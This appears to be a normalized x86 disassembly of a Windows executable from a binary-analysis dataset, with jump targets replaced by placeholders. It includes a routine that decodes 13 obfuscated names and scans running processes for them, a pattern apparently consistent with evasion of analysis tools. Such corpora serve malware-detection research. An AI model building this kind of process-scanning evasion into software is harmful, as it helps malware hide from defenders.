mov eax [ _acmdln@IAT ]
mov esi [ eax ]
mov [ ebp - 0x74 ] esi
cmp [ esi ] 0x22
jne r-xdata
push sub_403984
call [ __setusermatherr@IAT ]
pop ecx
cmp [ esi ] 0x20
jbe r-xdata
inc esi
mov [ ebp - 0x74 ] esi
mov al [ esi ]
cmp al bl
je r-xdata
mov al [ esi ]
cmp al bl
je r-xdata
inc esi
mov [ ebp - 0x74 ] esi
jmp r-xdata
cmp [ esi ] 0x22
jne r-xdata
cmp al 0x22
jne r-xdata
mov [ ebp - 0x30 ] ebx
lea eax [ ebp - 0x5c ]
push eax
call [ GetStartupInfoA@IAT ]
test [ ebp - 0x30 ] 0x1
je r-xdata
cmp al 0x20
jbe r-xdata
inc esi
mov [ ebp - 0x74 ] esi
push 0xa
pop eax
movzx eax [ ebp - 0x2c ]
jmp r-xdata
push eax
push esi
push ebx
push ebx
call [ GetModuleHandleA@IAT ]
push eax
call sub_401160
mov [ ebp - 0x68 ] eax
push eax
call [ exit@IAT ]
sub_4039a0
sub esp 0x34
push ebx
mov ebx [ esp + 0x3c ]
push esi
push edi
lea edi [ ebx + 0x4 ]
mov ecx 0xd
xor eax eax
mov [ ebx ] 0x0
[ edi ]
mov [ esp + 0xc ] rw-data
mov [ esp + 0x10 ] rw-data
mov [ esp + 0x14 ] rw-data
mov [ esp + 0x18 ] rw-data
mov [ esp + 0x1c ] rw-data
mov [ esp + 0x20 ] rw-data
mov [ esp + 0x24 ] rw-data
mov [ esp + 0x28 ] rw-data
mov [ esp + 0x2c ] rw-data
mov [ esp + 0x30 ] rw-data
mov [ esp + 0x34 ] rw-data
mov [ esp + 0x38 ] rw-data
mov [ esp + 0x3c ] rw-data
lea esi [ esp + 0xc ]
mov edi 0xd
mov eax [ esi ]
push eax
call sub_403b20
add esp 0x4
add esi 0x4
dec edi
jne r-xdata
mov esi 0x4
lea edi [ esp + 0xc ]
sub edi esi
add esi 0x4
cmp esi 0x38
jl r-xdata
mov [ esi + ebx ] 0x1
mov eax [ ebx ]
inc eax
mov [ ebx ] eax
mov ecx [ edi + esi ]
push ecx
call sub_403a80
add esp 0x4
test eax eax
je r-xdata
pop edi
pop esi
mov eax 0x1
pop ebx
add esp 0x34
retn
sub_403a80
sub esp 0x12c
push esi
push 0x0
push 0x2
mov [ esp + 0xc ] 0x0
call CreateToolhelp32Snapshot
mov esi eax
cmp esi 0xffffffff
jne r-xdata
push ebx
lea eax [ esp + 0xc ]
push ebp
push eax
push esi
mov [ esp + 0x18 ] 0x128
call Process32First
test eax eax
je r-xdata
xor eax eax
pop esi
add esp 0x12c
retn
push esi
call [ CloseHandle@IAT ]
mov ecx [ esp + 0xc ]
xor eax eax
test ecx ecx
pop ebp
pop ebx
setne al
pop esi
add esp 0x12c
retn
mov ebx [ esp + 0x13c ]
mov ebp [ StrStrIA@IAT ]
mov [ esp + 0xc ] 0x1
lea edx [ esp + 0x10 ]
push edx
push esi
call Process32Next
test eax eax
mov [ esp + 0x10 ] 0x128
jne r-xdata
lea ecx [ esp + 0x34 ]
push ebx
push ecx
call ebp
test eax eax
jne r-xdata
jmp r-xdata
sub_403b20
sub esp 0x10
mov al 0x1
mov cl 0x10
mov [ esp ] al
mov [ esp + 0x1 ] al
mov al 0x4
mov [ esp + 0x3 ] cl
mov [ esp + 0x4 ] al
mov [ esp + 0x5 ] al
mov al 0x8
mov [ esp + 0x8 ] cl
mov [ esp + 0x6 ] al
mov [ esp + 0x7 ] al
mov al 0x40
push esi
mov esi [ esp + 0x18 ]
mov [ esp + 0xf ] al
mov [ esp + 0x10 ] al
mov cl 0x20
mov al 0x80
push edi
mov [ esp + 0x12 ] cl
mov [ esp + 0x15 ] cl
mov [ esp + 0x16 ] al
mov [ esp + 0x17 ] al
mov edi esi
or ecx 0xffffffff
xor eax eax
mov dl 0x2
[ edi ]
not ecx
dec ecx
xor edi edi
test ecx ecx
mov [ esp + 0xa ] dl
mov [ esp + 0x11 ] dl
mov [ esp + 0x1c ] ecx
jle r-xdata
mov edi esi
or ecx 0xffffffff
xor eax eax
[ edi ]
not ecx
add ecx 0xfffffffe
cmp [ ecx + esi ] 0x20
jne r-xdata
push ebx
push ebp
mov [ ecx + esi + 0x1 ] 0x0
pop edi
pop esi
add esp 0x10
retn
xor eax eax
not bl
and dl bl
or dl bl
jmp r-xdata
mov [ ecx + esi + 0x1 ] al
pop edi
pop esi
add esp 0x10
retn
mov dl [ ecx + esi - 0x1 ]
dec ecx
cmp dl 0x20
je r-xdata
test [ eax - 0x1 ] cl
mov bl [ eax ]
je r-xdata
mov eax [ esp + 0x24 ]
mov [ edi + esi ] dl
inc edi
cmp edi eax
jl r-xdata
add eax 0x2
dec ebp
jne r-xdata
cmp ecx eax
jle r-xdata
mov cl [ edi + esi ]
xor dl dl
lea eax [ esp + 0x11 ]
mov ebp 0x8
pop ebp
pop ebx
sub_4017c3
push 0x0
call exit
sub_402a4e
push [ eax - 0xfb274ff ]
mov [ fs : 0x0 ] ecx
pop edi
pop esi
pop ebx
mov esp ebp
pop ebp
retn
sub_402a62
mov eax 0x1
retn
sub_402b09
mov eax 0x1
retn
malloc
jmp [ malloc@IAT ]
exit
jmp [ exit@IAT ]
fclose
jmp [ fclose@IAT ]
getc
jmp [ getc@IAT ]
fopen
jmp [ fopen@IAT ]
strrchr
jmp [ strrchr@IAT ]
_sleep
jmp [ _sleep@IAT ]
_access
jmp [ _access@IAT ]
strstr
jmp [ strstr@IAT ]
strtok
jmp [ strtok@IAT ]
sprintf
jmp [ sprintf@IAT ]
__CxxFrameHandler
jmp [ __CxxFrameHandler@IAT ]
fwrite
jmp [ fwrite@IAT ]
fprintf
jmp [ fprintf@IAT ]
strncmp
jmp [ strncmp@IAT ]
free
jmp [ free@IAT ]
atoi
jmp [ atoi@IAT ]
fscanf
jmp [ fscanf@IAT ]
strncpy
jmp [ strncpy@IAT ]
_snprintf
jmp [ _snprintf@IAT ]
realloc
jmp [ realloc@IAT ]
fflush
jmp [ fflush@IAT ]
_filelength
jmp [ _filelength@IAT ]
_except_handler3
jmp [ _except_handler3@IAT ]
_XcptFilter
jmp [ _XcptFilter@IAT ]
_initterm
jmp [ _initterm@IAT ]
sub_403972
push 0x30000
push 0x10000
call _controlfp
pop ecx
pop ecx
retn
sub_403984
xor eax eax
retn
sub_403987
retn
_controlfp
jmp [ _controlfp@IAT ]
GetAdaptersInfo
jmp [ GetAdaptersInfo@IAT ]
Process32Next
jmp [ Process32Next@IAT ]
Process32First
jmp [ Process32First@IAT ]
CreateToolhelp32Snapshot
jmp [ CreateToolhelp32Snapshot@IAT ]
_strdup
jmp [ _strdup@IAT ]
sub_403c20
mov eax r--data
jmp __CxxFrameHandler
